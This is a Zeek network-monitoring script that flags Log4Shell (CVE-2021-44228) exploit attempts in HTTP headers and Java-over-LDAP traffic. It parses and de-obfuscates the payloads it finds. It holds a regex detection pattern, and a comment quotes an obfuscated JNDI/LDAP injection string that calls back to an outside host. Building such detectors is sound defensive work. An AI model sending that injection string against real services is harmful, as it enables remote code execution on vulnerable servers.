module CVE_2021_44228;
# Refer to the following for a description of the methods used in script.
# Headers: https://corelight.com/blog/simplifying-detection-of-log4shell
# LDAP:    https://corelight.com/blog/detecting-the-log4j-exploit-via-zeek-and-ldap-traffic

@load-sigs ./ldap_java.sig

export {
    redef enum Notice::Type += {
        LOG4J_ATTEMPT_HEADER,
        LOG4J_LDAP_JAVA,
        LOG4J_SUCCESS
    };

    option log = T;
    # redef'd when running tests with btest. Leave as `F`.
    option run_tests = F;

    # Can be domains or addrs, so just have it be a string.
    option ignorable_target_hosts: set[string] = {};
    # Ignore hosts known to be benign & scanning for this behavior.
    option ignorable_orig_hosts: set[subnet] = {10.96.64.0/23,10.96.66.0/23,10.96.68.0/23,10.5.114.0/23,10.189.56.0/23,10.189.58.0/23,10.189.60.0/23,10.205.62.224/28,10.205.63.224/28,10.203.63.32/28,10.203.63.48/28,10.187.13.32/28,10.187.13.48/28,10.96.64.0/22,10.189.56.0/22};
    # Ignore resp hosts. `ignorable_orig_hosts` is probably what you want. This
    # would be for (1) ignoring internal honeypots that you know will look
    # "exploitable" or a known "malicious" server attempting to exploit
    # vulnerable Java clients.
    option ignorable_resp_hosts: set[addr] = {};

    # Try to normalize payloads to improve change of successfully retrieving the
    # payload information.
    option try_normalize = T;

    redef enum Log::ID += { LOG };

    const log_path = "log4j" &redef;

    global log_policy: Log::PolicyHook;
}

redef enum HTTP::Tags += {
        LOG4J_RCE
    };


type Info: record {
    ts: time &log;
    uid: string &log;
    http_uri: string &log;
    uri: string &log;
    stem: string &log;
    target_host: string &log;
    target_port: string &log;
    method: string &log;
    is_orig: bool &log;
    name: string &log;
    value: string &log;
    matched_name: bool &log;
    matched_value: bool &log;
    };

type PayloadParts: record {
    uri: string;
    stem: string;
    host: string;
    port_: string;
    };

# Very general, FPs expected but we're casting a wide net intentionally.
# Approach:
# Match ${
# unless it's ${@ (php junk)
# and only if it has a : in the middle and
# and ending brace.
# See test cases in zeek_init() for what we consider to be a TP/FP.
global exploit_pattern: pattern = /\$\{[^@][^}]+:[^}]+\}/;

# Stack used for `normalize`. Shouldn't be used outside of that function.
global stack: vector of string;

function peek(): string
    {
    if ( |stack| == 0 )
        return "";
    else
        return stack[|stack|-1];
    }

function pop(): string
    {
    if ( |stack| == 0 )
        return "";
    local x = peek();
    stack = stack[0:|stack|-1];
    return x;
    }

function push(x: string)
    {
    stack += x;
    }

function clear_stack()
    {
    stack = vector();
    }

# Attempts to normalize log4j payload to remove most common obfuscations. There
# are effectively an infinite number of ways to do this, so don't expect it to
# cover everything. See tests in `zeek_init()` to understand what it handles.
#
# Algorithm works as follows:
#
# "$" and "{" are pushed onto the stack when encountered.
# Set a flag to show we have seen the first "$" "{" set.
# If we are on our second+ set of "$" "{", start ignoring characters
# If we see a ":" while ignoring, we have passed the function portion and should stop ignoring.
# When we hit a "}", pop the previous "{" and "$" off the stack. If the stack is
# now empty, this was the first instance (i.e., `${jdni...`) and it should be
# preserved, otherwise, remove it.
function normalize(payload: string): string
    {
    # Replace default substitution string with normal formatting string, i.e., ${::-j} -> ${:j}
    payload = gsub(payload, /::\-/, ":");
    local to_remove: set[count];
    local i = 0;
    local ignoring = F;
    local saw_first = F;
    while ( i != |payload| )
        {
        local c = payload[i];
        switch ( c )
            {
            case "$":
                push(c);
                break;
            case "{":
                if ( peek() == "$" )
                    push(c);
                if ( !saw_first )
                    {
                    saw_first = T;
                    }
                else
                    {
                    # Add previous "$"
                    add to_remove[i-1];
                    ignoring = T;
                    }
                break;
            case ":":
                if ( ignoring )
                    {
                    add to_remove[i];
                    ignoring = F;
                    }
                break;
            case "}":
                local open_brace = pop();
                local dollar = pop();
                # We only want to remove internal ones
                if ( dollar == "$" && open_brace == "{" && |stack| > 0 )
                    add to_remove[i];
                break;
            }

        if ( ignoring )
            add to_remove[i];
        ++i;
        }

    local new_payload: vector of string;
    i = 0;
    while ( i != |payload| )
        {
        if ( i !in to_remove )
            new_payload += payload[i];
        ++i;
        }
    clear_stack();
    return join_string_vec(new_payload, "");
    }

# If split doesn't return the expected number of indices, return the default "-"
function safe_split1_w_default(s: string, p: pattern, idx: count, missing: string &default="-"): string
    {
    local tmp = split_string1(s, p);
    if ( |tmp| > idx )
        return tmp[idx];
    else
        return missing;
    }

# Assumes `name` or `value` string passed as `s` has the structure:
# ${jdni:ldap://payload_host:payload_port/path} for the payload. Many examples
# of more complicated obfuscation exist. If the structure is different, fill
# missing fields with "-" so other structures in the wild can be explored in the
# logs. For example, Binary Edge are using the following type of obfuscation:
# ...value='${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}'
function parse_payload(s: string): PayloadParts
    {
    if ( try_normalize )
        s = normalize(s);
    local tmp = split_string(s, /\/\//);
    local last: string = "-";
    if ( |tmp| > 0 )
        last = tmp[(|tmp| - 1)];
    local payload_uri  = safe_split1_w_default(last, /\}/, 0);
    local payload_stem = safe_split1_w_default(payload_uri, /\//, 0);
    local payload_host = safe_split1_w_default(payload_stem, /\:/, 0);
    local payload_port = safe_split1_w_default(payload_stem, /\:/, 1);

    return PayloadParts($uri=payload_uri, $stem=payload_stem, $host=payload_host, $port_=payload_port);
    }

event http_header(c: connection, is_orig: bool, name: string, value: string)
    {
    if ( c$id$orig_h in ignorable_orig_hosts )
        return;
    if ( c$id$resp_h in ignorable_resp_hosts )
        return;
    # Focus is mainly on client headers, but not filtering right now to explore interesting cases in the wild
    # if (!is_orig)
    #     return;
    # Focus is mainly on value of header, but adding 'name' to explore what is being used in the wild
    local matched_name = exploit_pattern in name;
    local matched_value = exploit_pattern in value;
    local http_uri: string = "";
    local http_method: string = "";

    # Handle potentially missing fields
    if ( c$http?$uri )
        http_uri = c$http$uri;
    if ( c$http?$method )
        http_method = c$http$method;

    # Ignore matches that contain binary goop. This was a large contributor to
    # false positives.
    if ( matched_name && !is_ascii(name) )
        return;
    if ( matched_value && !is_ascii(value) )
        return;

    if ( !matched_name && !matched_value )
        return;

    add c$http$tags[LOG4J_RCE];

    local payload: PayloadParts;
    local info: Info;

    # TODO: add to a clusterized set for watching of subsequent traffic (LOG4J_SUCCESS notice).
    if ( matched_name )
        {
        payload = parse_payload(name);
        if ( payload$host in ignorable_target_hosts )
            return;
        info = Info($ts=network_time(), $uid=c$uid, $http_uri=http_uri, $uri=payload$uri, $stem=payload$stem, $target_host=payload$host, $target_port=payload$port_, $method=http_method, $is_orig=is_orig, $name=name, $value=value, $matched_name=matched_name, $matched_value=matched_value);
        NOTICE([$note=LOG4J_ATTEMPT_HEADER,
                $conn=c,
                $identifier=cat(c$id$orig_h,c$id$resp_h,c$id$resp_p,cat(name,value)),
                # $suppress_for=3600sec,
                $msg=fmt("Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers"),
                $sub=fmt("uri='%s', payload_uri=%s, payload_stem=%s, payload_host=%s, payload_port=%s, method=%s, is_orig=%s, header name='%s',  header value='%s' ", http_uri, payload$uri, payload$stem, payload$host, payload$port_, http_method, is_orig, name, value)]);
        if ( log )
            Log::write(LOG, info);
        }
    if ( matched_value )
        {
        payload = parse_payload(value);
        if ( payload$host in ignorable_target_hosts )
            return;
        info = Info($ts=network_time(), $uid=c$uid, $http_uri=http_uri, $uri=payload$uri, $stem=payload$stem, $target_host=payload$host, $target_port=payload$port_, $method=http_method, $is_orig=is_orig, $name=name, $value=value, $matched_name=matched_name, $matched_value=matched_value);
        NOTICE([$note=LOG4J_ATTEMPT_HEADER,
                $conn=c,
                $identifier=cat(c$id$orig_h,c$id$resp_h,c$id$resp_p,cat(name,value)),
                # $suppress_for=3600sec,
                $msg=fmt("Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers"),
                $sub=fmt("uri='%s', payload_uri=%s, payload_stem=%s, payload_host=%s, payload_port=%s, method=%s, is_orig=%s, header name='%s',  header value='%s' ", http_uri, payload$uri, payload$stem, payload$host, payload$port_, http_method, is_orig, name, value)]);
        if ( log )
            Log::write(LOG, info);
        }
    }

event signature_match(state: signature_state, msg: string, data: string)
    {
    if ( !(msg == "log4j_javaclassname_udp" || msg == "log4j_javaclassname_tcp") )
       return;

    NOTICE([$note=LOG4J_LDAP_JAVA,
            $conn=state$conn,
            $identifier=cat(state$conn$id$orig_h,state$conn$id$resp_h,state$conn$id$resp_p),
            # $suppress_for=3600sec,
            $msg=fmt("Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload."),
            $sub=data]);
    }

event zeek_init() &priority=5
    {
    Log::create_stream(CVE_2021_44228::LOG, [$columns=Info, $path=log_path, $policy=log_policy]);
    }